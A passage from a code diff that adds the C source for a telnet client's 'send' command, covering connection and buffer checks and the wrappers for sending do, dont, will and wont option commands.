send_help(NULL, NULL); + return 0; + } + + i += s->narg; + needconnect += s->needconnect; + } + if (!connected && needconnect) { + printf("?Need to be connected first.\n"); + printf("'send ?' for help\n"); + return 0; + } + /* Now, do we have enough room? */ + if (netoring.empty_count() < count) { + printf("There is not enough room in the buffer TO the network\n"); + printf("to process your request. Nothing will be done.\n"); + printf("('send synch' will throw away most data in the network\n"); + printf("buffer, if this might help.)\n"); + return 0; + } + /* OK, they are all OK, now go through again and actually send */ + count = 0; + for (i = 1; i < argc; i++) { + if ((s = GETSEND(argv[i])) == 0) { + fprintf(stderr, "Telnet 'send' error - argument disappeared!\n"); + quit(); + /*NOTREACHED*/ + } + if (s->handler) { + count++; + success += (*s->handler)((s->narg > 0) ? argv[i+1] : 0, + (s->narg > 1) ? argv[i+2] : 0); + i += s->narg; + } + else { + NET2ADD(IAC, s->what); + printoption("SENT", IAC, s->what); + } + } + return (count == success); +} + +static int send_esc(const char *, const char *) { + NETADD(escapechar); + return 1; +} + +static int send_docmd(const char *name, const char *) { + return send_tncmd(send_do, "do", name); +} + +static int send_dontcmd(const char *name, const char *) { + return(send_tncmd(send_dont, "dont", name)); +} + +static int send_willcmd(const char *name, const char *) { + return(send_tncmd(send_will, "will", name)); +} + +static int send_wontcmd(const char *name, const char *) { + return(send_tncmd(send_wont, "wont", name)); +} + +int send_tncmd(int (*func)(int, int), const char *cmd, const char *name) { + char **cpp; + extern char *telopts[]; + + if (isprefix(name, "help") || isprefix(name, "?")) { + register int col, len; + + printf("Usage: send %s